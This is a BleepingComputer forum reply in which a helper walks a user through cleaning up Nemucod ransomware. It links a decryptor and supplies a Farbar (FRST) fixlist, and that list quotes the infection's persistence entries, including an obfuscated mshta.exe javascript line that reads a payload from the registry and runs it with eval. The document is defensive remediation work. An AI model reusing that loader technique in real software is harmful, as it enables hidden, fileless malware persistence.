Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Stay with this topic.
Execute the instructions on the
Decryptor Released for the Nemucod Trojan's .CRYPTED Ransomware
Hope you can get some of your files back in service.
===
When finished, run this fix.
Press the windows key
+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to a new file.
Start
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
(© 2015 Microsoft Corporation) C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\...\Run: [BingSvc] => C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\...\Run: [Crypted] => C:\Users\karin\AppData\Local\Temp\a.txt [1353 2016-10-04] () <===== ATTENTION
Startup: C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\317b9.lnk [2016-10-19]
ShortcutTarget: 317b9.lnk -> (No File)
Startup: C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b2ec.lnk [2016-10-19]
ShortcutTarget: 8b2ec.lnk -> (No File)
CHR Extension: (Bing) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2016-09-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Chrome Media Router) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-30]
CHR HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\Software\Classes\bb920: "C:\WINDOWS\system32\mshta.exe" "javascript:M6PHvy1C="tot";Hn35=new ActiveXObject("WScript.Shell");OSPYE7v="ww3l5v";I0vs2z=Hn35.RegRead("HKCU\\software\\aesi\\pbvkrllx");WysS67J="9vbaeu";eval(I0vs2z);SZ7XrV4="rYe";" <===== ATTENTION
C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe
C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\317b9.lnk
C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b2ec.lnk
Reboot:
End
Save the file as
fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.
Run
FRST and click
Fix only once and wait.
The tool will create a log (Fixlog.txt) please post it to your reply.
Please let me know what problem persists with this computer.
===
ADOBE SHOCKWARENavigate to this page and follow the instructions to get the latest version.
https://www.adobe.com/shockwave/welcome/Remove this old version if still present via the Control Panel > Programs > Programs and Features.
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.159 - Adobe Systems, Inc.)
Edited by nasdaq, 31 December 2016 - 10:18 AM.